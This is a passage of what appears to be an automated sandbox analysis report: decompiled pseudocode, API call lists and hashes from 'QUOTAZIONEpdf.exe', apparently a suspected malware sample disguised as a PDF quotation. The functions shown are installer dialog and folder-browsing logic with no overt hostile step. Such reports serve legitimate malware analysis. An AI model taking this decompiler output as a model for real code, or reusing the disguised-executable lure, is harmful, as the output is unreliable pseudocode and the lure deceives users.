                								_t112 =  *0x41fc68; // 0x0
                								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
                							}
                							E00403E10(1);
                							goto L25;
                						}
                						 *0x41f860 = 2;
                						E00403E10(0x78);
                						goto L20;
                					} else {
                						if(_a12 != 0x403) {
                							L20:
                							return E00403E9E(_a8, _a12, _a16);
                						}
                						ShowWindow( *0x423670, _t149);
                						ShowWindow(_t154, 8);
                						E00403E6C(_t154);
                						goto L17;
                					}
                				}
                				_v52 = _v52 | 0xffffffff;
                				_v40 = _v40 | 0xffffffff;
                				_v60 = 2;
                				_v56 = 0;
                				_v48 = 0;
                				_v44 = 0;
                				asm("stosd");
                				asm("stosd");
                				_t123 =  *0x423eb0;
                				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                				 *0x423670 = GetDlgItem(_a4, 0x403);
                				 *0x423668 = GetDlgItem(_a4, 0x3ee);
                				_t127 = GetDlgItem(_a4, 0x3f8);
                				 *0x423684 = _t127;
                				_v8 = _t127;
                				E00403E6C( *0x423670);
                				 *0x423674 = E004046C5(4);
                				 *0x42368c = 0;
                				GetClientRect(_v8,  &_v28);
                				_v52 = _v28.right - GetSystemMetrics(0x15);
                				SendMessageA(_v8, 0x101b, 0,  &_v60);
                				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                				if(_a8 >= 0) {
                					SendMessageA(_v8, 0x1001, 0, _a8);
                					SendMessageA(_v8, 0x1026, 0, _a8);
                				}
                				if(_a12 >= _t149) {
                					SendMessageA(_v8, 0x1024, _t149, _a12);
                				}
                				_push( *((intOrPtr*)(_a16 + 0x30)));
                				_push(0x1b);
                				E00403E37(_a4);
                				if(( *0x423eb8 & 0x00000003) != 0) {
                					ShowWindow( *0x423670, _t149);
                					if(( *0x423eb8 & 0x00000002) != 0) {
                						 *0x423670 = _t149;
                					} else {
                						ShowWindow(_v8, 8);
                					}
                					E00403E6C( *0x423668);
                				}
                				_t158 = GetDlgItem(_a4, 0x3ec);
                				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                				if(( *0x423eb8 & 0x00000004) != 0) {
                					SendMessageA(_t158, 0x409, _t149, _a12);
                					SendMessageA(_t158, 0x2001, _t149, _a8);
                				}
                				goto L37;
                			}


                APIs
                • GetDlgItem.USER32 ref: 00404FC0
                • GetDlgItem.USER32 ref: 00404FCF
                • GetClientRect.USER32 ref: 0040500C
                • GetSystemMetrics.USER32 ref: 00405014
                • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405035
                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405046
                • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00405059
                • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405067
                • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040507A
                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040509C
                • ShowWindow.USER32(?,00000008), ref: 004050B0
                • GetDlgItem.USER32 ref: 004050D1
                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004050E1
                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004050FA
                • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405106
                • GetDlgItem.USER32 ref: 00404FDE
                  • Part of subcall function 00403E6C: SendMessageA.USER32(00000028,?,00000001,00403C9D), ref: 00403E7A
                • GetDlgItem.USER32 ref: 00405123
                • CreateThread.KERNEL32 ref: 00405131
                • CloseHandle.KERNEL32(00000000), ref: 00405138
                • ShowWindow.USER32(00000000), ref: 0040515C
                • ShowWindow.USER32(?,00000008), ref: 00405161
                • ShowWindow.USER32(00000008), ref: 004051A8
                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051DA
                • CreatePopupMenu.USER32 ref: 004051EB
                • AppendMenuA.USER32 ref: 00405200
                • GetWindowRect.USER32 ref: 00405213
                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405272
                • OpenClipboard.USER32(00000000), ref: 00405282
                • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405288
                • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
                • GlobalLock.KERNEL32 ref: 0040529B
                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052AF
                • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
                • SetClipboardData.USER32 ref: 004052D2
                • CloseClipboard.USER32 ref: 004052D8
                Strings
                Similarity
                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                • String ID: {
                • API String ID: 590372296-366298937
                • Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                • Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
                • Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                • Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 97%
                			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                				struct HWND__* _v8;
                				struct HWND__* _v12;
                				signed int _v16;
                				intOrPtr _v20;
                				void* _v24;
                				long _v28;
                				int _v32;
                				signed int _v40;
                				int _v44;
                				signed int* _v56;
                				intOrPtr _v60;
                				signed int _v64;
                				long _v68;
                				void* _v72;
                				intOrPtr _v76;
                				intOrPtr _v80;
                				void* _v84;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				struct HWND__* _t182;
                				int _t196;
                				long _t202;
                				signed int _t206;
                				signed int _t217;
                				void* _t220;
                				void* _t221;
                				int _t227;
                				signed int _t232;
                				signed int _t233;
                				signed int _t240;
                				struct HBITMAP__* _t250;
                				void* _t252;
                				char* _t268;
                				signed char _t269;
                				long _t274;
                				int _t280;
                				signed int* _t281;
                				int _t282;
                				long _t283;
                				int _t285;
                				long _t286;
                				signed int _t287;
                				long _t288;
                				signed int _t291;
                				signed int _t298;
                				signed int _t300;
                				signed int _t302;
                				int* _t310;
                				void* _t311;
                				int _t315;
                				int _t316;
                				int _t317;
                				signed int _t318;
                				void* _t320;
                
                				_v12 = GetDlgItem(_a4, 0x3f9);
                				_t182 = GetDlgItem(_a4, 0x408);
                				_t280 =  *0x423ec8;
                				_t320 = SendMessageA;
                				_v8 = _t182;
                				_t315 = 0;
                				_v32 = _t280;
                				_v20 =  *0x423eb0 + 0x94;
                				if(_a8 != 0x110) {
                					L23:
                					if(_a8 != 0x405) {
                						_t289 = _a16;
                					} else {
                						_a12 = _t315;
                						_t289 = 1;
                						_a8 = 0x40f;
                						_a16 = 1;
                					}
                					if(_a8 == 0x4e || _a8 == 0x413) {
                						_v16 = _t289;
                						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
                							if(( *0x423eb9 & 0x00000002) != 0) {
                								L41:
                								if(_v16 != _t315) {
                									_t232 = _v16;
                									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                									}
                									_t233 = _v16;
                									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
                										} else {
                											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                										}
                									}
                								}
                								goto L48;
                							}
                							if(_a8 == 0x413) {
                								L33:
                								_t289 = 0 | _a8 != 0x00000413;
                								_t240 = E004046F2(_v8, _a8 != 0x413);
                								if(_t240 >= _t315) {
                									_t93 = _t280 + 8; // 0x8
                									_t310 = _t240 * 0x418 + _t93;
                									_t289 =  *_t310;
                									if((_t289 & 0x00000010) == 0) {
                										if((_t289 & 0x00000040) == 0) {
                											_t298 = _t289 ^ 0x00000001;
                										} else {
                											_t300 = _t289 ^ 0x00000080;
                											if(_t300 >= 0) {
                												_t298 = _t300 & 0xfffffffe;
                											} else {
                												_t298 = _t300 | 0x00000001;
                											}
                										}
                										 *_t310 = _t298;
                										E0040117D(_t240);
                										_t289 = 1;
                										_a8 = 0x40f;
                										_a12 = 1;
                										_a16 =  !( *0x423eb8) >> 0x00000008 & 1;
                									}
                								}
                								goto L41;
                							}
                							_t289 = _a16;
                							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                								goto L41;
                							}
                							goto L33;
                						} else {
                							goto L48;
                						}
                					} else {
                						L48:
                						if(_a8 != 0x111) {
                							L56:
                							if(_a8 == 0x200) {
                								SendMessageA(_v8, 0x200, _t315, _t315);
                							}
                							if(_a8 == 0x40b) {
                								_t220 =  *0x420474;
                								if(_t220 != _t315) {
                									ImageList_Destroy(_t220);
                								}
                								_t221 =  *0x42048c;
                								if(_t221 != _t315) {
                									GlobalFree(_t221);
                								}
                								 *0x420474 = _t315;
                								 *0x42048c = _t315;
                								 *0x423f00 = _t315;
                							}
                							if(_a8 != 0x40f) {
                								L86:
                								if(_a8 == 0x420 && ( *0x423eb9 & 0x00000001) != 0) {
                									_t316 = (0 | _a16 == 0x00000020) << 3;
                									ShowWindow(_v8, _t316);
                									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                								}
                								goto L89;
                							} else {
                								E004011EF(_t289, _t315, _t315);
                								if(_a12 != _t315) {
                									E0040140B(8);
                								}
                								if(_a16 == _t315) {
                									L73:
                									E004011EF(_t289, _t315, _t315);
                									_v32 =  *0x42048c;
                									_t196 =  *0x423ec8;
                									_v60 = 0xf030;
                									_v16 = _t315;
                									if( *0x423ecc <= _t315) {
                										L84:
                										InvalidateRect(_v8, _t315, 1);
                										if( *((intOrPtr*)( *0x42367c + 0x10)) != _t315) {
                											E00404610(0x3ff, 0xfffffffb, E004046C5(5));
                										}
                										goto L86;
                									}
                									_t281 = _t196 + 8;
                									do {
                										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                										if(_t202 != _t315) {
                											_t291 =  *_t281;
                											_v68 = _t202;
                											_v72 = 8;
                											if((_t291 & 0x00000001) != 0) {
                												_v72 = 9;
                												_v56 =  &(_t281[4]);
                												_t281[0] = _t281[0] & 0x000000fe;
                											}
                											if((_t291 & 0x00000040) == 0) {
                												_t206 = (_t291 & 0x00000001) + 1;
                												if((_t291 & 0x00000010) != 0) {
                													_t206 = _t206 + 3;
                												}
                											} else {
                												_t206 = 3;
                											}
                											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
                											SendMessageA(_v8, 0x110d, _t315,  &_v72);
                										}
                										_v16 = _v16 + 1;
                										_t281 =  &(_t281[0x106]);
                									} while (_v16 <  *0x423ecc);
                									goto L84;
                								} else {
                									_t282 = E004012E2( *0x42048c);
                									E00401299(_t282);
                									_t217 = 0;
                									_t289 = 0;
                									if(_t282 <= _t315) {
                										L72:
                										SendMessageA(_v12, 0x14e, _t289, _t315);
                										_a16 = _t282;
                										_a8 = 0x420;
                										goto L73;
                									} else {
                										goto L69;
                									}
                									do {
                										L69:
                										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
                											_t289 = _t289 + 1;
                										}
                										_t217 = _t217 + 1;
                									} while (_t217 < _t282);
                									goto L72;
                								}
                							}
                						}
                						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                							goto L89;
                						} else {
                							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                							if(_t227 == 0xffffffff) {
                								goto L89;
                							}
                							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
                								_t283 = 0x20;
                							}
                							E00401299(_t283);
                							SendMessageA(_a4, 0x420, _t315, _t283);
                							_a12 = 1;
                							_a16 = _t315;
                							_a8 = 0x40f;
                							goto L56;
                						}
                					}
                				} else {
                					 *0x423f00 = _a4;
                					_t285 = 2;
                					_v28 = 0;
                					_v16 = _t285;
                					 *0x42048c = GlobalAlloc(0x40,  *0x423ecc << 2);
                					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
                					 *0x420480 =  *0x420480 | 0xffffffff;
                					_v24 = _t250;
                					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
                					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                					 *0x420474 = _t252;
                					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
                					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                						SendMessageA(_v8, 0x111b, 0x10, 0);
                					}
                					DeleteObject(_v24);
                					_t286 = 0;
                					do {
                						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                							if(_t286 != 0x20) {
                								_v16 = _t315;
                							}
                							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
                						}
                						_t286 = _t286 + 1;
                					} while (_t286 < 0x21);
                					_t317 = _a16;
                					_t287 = _v16;
                					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                					_push(0x15);
                					E00403E37(_a4);
                					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                					_push(0x16);
                					E00403E37(_a4);
                					_t318 = 0;
                					_t288 = 0;
                					if( *0x423ecc <= 0) {
                						L19:
                						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                						goto L20;
                					} else {
                						_t311 = _v32 + 8;
                						_v24 = _t311;
                						do {
                							_t268 = _t311 + 0x10;
                							if( *_t268 != 0) {
                								_v60 = _t268;
                								_t269 =  *_t311;
                								_t302 = 0x20;
                								_v84 = _t288;
                								_v80 = 0xffff0002;
                								_v76 = 0xd;
                								_v64 = _t302;
                								_v40 = _t318;
                								_v68 = _t269 & _t302;
                								if((_t269 & 0x00000002) == 0) {
                									if((_t269 & 0x00000004) == 0) {
                										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                									} else {
                										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                									}
                								} else {
                									_v76 = 0x4d;
                									_v44 = 1;
                									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                									_v28 = 1;
                									 *( *0x42048c + _t318 * 4) = _t274;
                									_t288 =  *( *0x42048c + _t318 * 4);
                								}
                							}
                							_t318 = _t318 + 1;
                							_t311 = _v24 + 0x418;
                							_v24 = _t311;
                						} while (_t318 <  *0x423ecc);
                						if(_v28 != 0) {
                							L20:
                							if(_v16 != 0) {
                								E00403E6C(_v8);
                								_t280 = _v32;
                								_t315 = 0;
                								goto L23;
                							} else {
                								ShowWindow(_v12, 5);
                								E00403E6C(_v12);
                								L89:
                								return E00403E9E(_a8, _a12, _a16);
                							}
                						}
                						goto L19;
                					}
                				}
                			}

                APIs
                • GetDlgItem.USER32 ref: 00404789
                • GetDlgItem.USER32 ref: 00404796
                • GlobalAlloc.KERNEL32(00000040,?), ref: 004047E2
                • LoadBitmapA.USER32 ref: 004047F5
                • SetWindowLongA.USER32(?,000000FC,00404D73), ref: 0040480F
                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404823
                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404837
                • SendMessageA.USER32(?,00001109,00000002), ref: 0040484C
                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404858
                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040486A
                • DeleteObject.GDI32(?), ref: 0040486F
                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040489A
                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004048A6
                • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040493B
                • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404966
                • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040497A
                • GetWindowLongA.USER32 ref: 004049A9
                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 004049B7
                • ShowWindow.USER32(?,00000005), ref: 004049C8
                • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404ACB
                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B30
                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404B45
                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404B69
                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404B8F
                • ImageList_Destroy.COMCTL32(?), ref: 00404BA4
                • GlobalFree.KERNEL32 ref: 00404BB4
                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C24
                • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404CCD
                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404CDC
                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404CFC
                • ShowWindow.USER32(?,00000000), ref: 00404D4A
                • GetDlgItem.USER32 ref: 00404D55
                • ShowWindow.USER32(00000000), ref: 00404D5C
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                • String ID: $M$N
                • API String ID: 1638840714-813528018
                • Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                • Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
                • Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                • Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
                				signed int _v8;
                				struct HWND__* _v12;
                				long _v16;
                				long _v20;
                				char _v24;
                				long _v28;
                				char _v32;
                				intOrPtr _v36;
                				long _v40;
                				signed int _v44;
                				CHAR* _v52;
                				intOrPtr _v56;
                				intOrPtr _v60;
                				intOrPtr _v64;
                				CHAR* _v68;
                				void _v72;
                				char _v76;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr _t81;
                				long _t86;
                				signed char* _t88;
                				void* _t94;
                				signed int _t95;
                				signed short _t113;
                				signed int _t117;
                				char* _t122;
                				intOrPtr* _t138;
                				signed int* _t145;
                				signed int _t148;
                				signed int _t153;
                				struct HWND__* _t159;
                				CHAR* _t162;
                				int _t163;
                
                				_t81 =  *0x41fc68; // 0x0
                				_v36 = _t81;
                				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
                				_v8 =  *((intOrPtr*)(_t81 + 0x38));
                				if(_a8 == 0x40b) {
                					E0040532A(0x3fb, _t162);
                					E00405CE3(_t162);
                				}
                				if(_a8 != 0x110) {
                					L8:
                					if(_a8 != 0x111) {
                						L20:
                						if(_a8 == 0x40f) {
                							L22:
                							_v8 = _v8 & 0x00000000;
                							_v12 = _v12 & 0x00000000;
                							E0040532A(0x3fb, _t162);
                							if(E00405659(_t180, _t162) == 0) {
                								_v8 = 1;
                							}
                							E00405A85(0x41f460, _t162);
                							_t145 = 0;
                							_t86 = E00405DA3(0);
                							_v16 = _t86;
                							if(_t86 == 0) {
                								L31:
                								E00405A85(0x41f460, _t162);
                								_t88 = E0040560C(0x41f460);
                								if(_t88 != _t145) {
                									 *_t88 =  *_t88 & 0x00000000;
                								}
                								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
                									_t153 = _a8;
                									goto L37;
                								} else {
                									_t163 = 0x400;
                									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
                									_v12 = 1;
                									goto L38;
                								}
                							} else {
                								if(0 == 0x41f460) {
                									L30:
                									_t145 = 0;
                									goto L31;
                								} else {
                									goto L26;
                								}
                								while(1) {
                									L26:
                									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
                									if(_t113 != 0) {
                										break;
                									}
                									if(_t145 != 0) {
                										 *_t145 =  *_t145 & _t113;
                									}
                									_t145 = E004055BF(0x41f460) - 1;
                									 *_t145 = 0x5c;
                									if(_t145 != 0x41f460) {
                										continue;
                									} else {
                										goto L30;
                									}
                								}
                								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
                								_v12 = 1;
                								_t145 = 0;
                								L37:
                								_t163 = 0x400;
                								L38:
                								_t94 = E004046C5(5);
                								if(_v12 != _t145 && _t153 < _t94) {
                									_v8 = 2;
                								}
                								if( *((intOrPtr*)( *0x42367c + 0x10)) != _t145) {
                									E00404610(0x3ff, 0xfffffffb, _t94);
                									if(_v12 == _t145) {
                										SetDlgItemTextA(_a4, _t163, 0x41f450);
                									} else {
                										E00404610(_t163, 0xfffffffc, _t153);
                									}
                								}
                								_t95 = _v8;
                								 *0x423f44 = _t95;
                								if(_t95 == _t145) {
                									_v8 = E0040140B(7);
                								}
                								if(( *(_v36 + 0x14) & _t163) != 0) {
                									_v8 = _t145;
                								}
                								E00403E59(0 | _v8 == _t145);
                								if(_v8 == _t145 &&  *0x420484 == _t145) {
                									E0040420A();
                								}
                								 *0x420484 = _t145;
                								goto L53;
                							}
                						}
                						_t180 = _a8 - 0x405;
                						if(_a8 != 0x405) {
                							goto L53;
                						}
                						goto L22;
                					}
                					_t117 = _a12 & 0x0000ffff;
                					if(_t117 != 0x3fb) {
                						L12:
                						if(_t117 == 0x3e9) {
                							_t148 = 7;
                							memset( &_v72, 0, _t148 << 2);
                							_v76 = _a4;
                							_v68 = 0x420498;
                							_v56 = E004045AA;
                							_v52 = _t162;
                							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
                							_t122 =  &_v76;
                							_v60 = 0x41;
                							__imp__SHBrowseForFolderA(_t122);
                							if(_t122 == 0) {
                								_a8 = 0x40f;
                							} else {
                								__imp__CoTaskMemFree(_t122);
                								E00405578(_t162);
                								_t125 =  *((intOrPtr*)( *0x423eb0 + 0x11c));
                								if( *((intOrPtr*)( *0x423eb0 + 0x11c)) != 0 && _t162 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
                									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
                									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
                										lstrcatA(_t162, 0x422e40);
                									}
                								}
                								 *0x420484 =  &(( *0x420484)[0]);
                								SetDlgItemTextA(_a4, 0x3fb, _t162);
                							}
                						}
                						goto L20;
                					}
                					if(_a12 >> 0x10 != 0x300) {
                						goto L53;
                					}
                					_a8 = 0x40f;
                					goto L12;
                				} else {
                					_t159 = _a4;
                					_v12 = GetDlgItem(_t159, 0x3fb);
                					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
                						E00405578(_t162);
                					}
                					 *0x423678 = _t159;
                					SetWindowTextA(_v12, _t162);
                					_push( *((intOrPtr*)(_a16 + 0x34)));
                					_push(1);
                					E00403E37(_t159);
                					_push( *((intOrPtr*)(_a16 + 0x30)));
                					_push(0x14);
                					E00403E37(_t159);
                					E00403E6C(_v12);
                					_t138 = E00405DA3(7);
                					if(_t138 == 0) {
                						L53:
                						return E00403E9E(_a8, _a12, _a16);
                					}
                					 *_t138(_v12, 1);
                					goto L8;
                				}
                			}

                APIs
                • GetDlgItem.USER32 ref: 004042C1
                • SetWindowTextA.USER32(?,?), ref: 004042EE
                • SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
                • CoTaskMemFree.OLE32(00000000), ref: 004043AE
                • lstrcmpiA.KERNEL32(afqfmqnwor,00420498,00000000,?,?), ref: 004043E0
                • lstrcatA.KERNEL32(?,afqfmqnwor), ref: 004043EC
                • SetDlgItemTextA.USER32 ref: 004043FC
                  • Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D
                  • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                  • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                  • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                  • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                • GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044D0
                • SetDlgItemTextA.USER32 ref: 00404549
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                • String ID: A$C:\Users\user\AppData\Local\Temp$afqfmqnwor
                • API String ID: 2246997448-3340936956
                • Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                • Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
                • Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                • Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 74%
                			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                				signed int _v8;
                				struct _ITEMIDLIST* _v12;
                				signed int _v16;
                				signed char _v20;
                				signed char _v24;
                				signed int _v28;
                				signed int _t36;
                				CHAR* _t37;
                				signed char _t39;
                				signed int _t40;
                				int _t41;
                				char _t51;
                				char _t52;
                				char _t54;
                				char _t56;
                				void* _t64;
                				signed int _t68;
                				signed int _t73;
                				signed char _t74;
                				char _t81;
                				void* _t83;
                				CHAR* _t84;
                				void* _t86;
                				signed int _t93;
                				signed int _t95;
                				void* _t96;
                
                				_t86 = __esi;
                				_t83 = __edi;
                				_t64 = __ebx;
                				_t36 = _a8;
                				if(_t36 < 0) {
                					_t36 =  *( *0x42367c - 4 + _t36 * 4);
                				}
                				_t73 =  *0x423ed8 + _t36;
                				_t37 = 0x422e40;
                				_push(_t64);
                				_push(_t86);
                				_push(_t83);
                				_t84 = 0x422e40;
                				if(_a4 - 0x422e40 < 0x800) {
                					_t84 = _a4;
                					_a4 = _a4 & 0x00000000;
                				}
                				while(1) {
                					_t81 =  *_t73;
                					if(_t81 == 0) {
                						break;
                					}
                					__eflags = _t84 - _t37 - 0x400;
                					if(_t84 - _t37 >= 0x400) {
                						break;
                					}
                					_t73 = _t73 + 1;
                					__eflags = _t81 - 0xfc;
                					_a8 = _t73;
                					if(__eflags <= 0) {
                						if(__eflags != 0) {
                							 *_t84 = _t81;
                							_t84 =  &(_t84[1]);
                							__eflags = _t84;
                						} else {
                							 *_t84 =  *_t73;
                							_t84 =  &(_t84[1]);
                							_t73 = _t73 + 1;
                						}
                						continue;
                					}
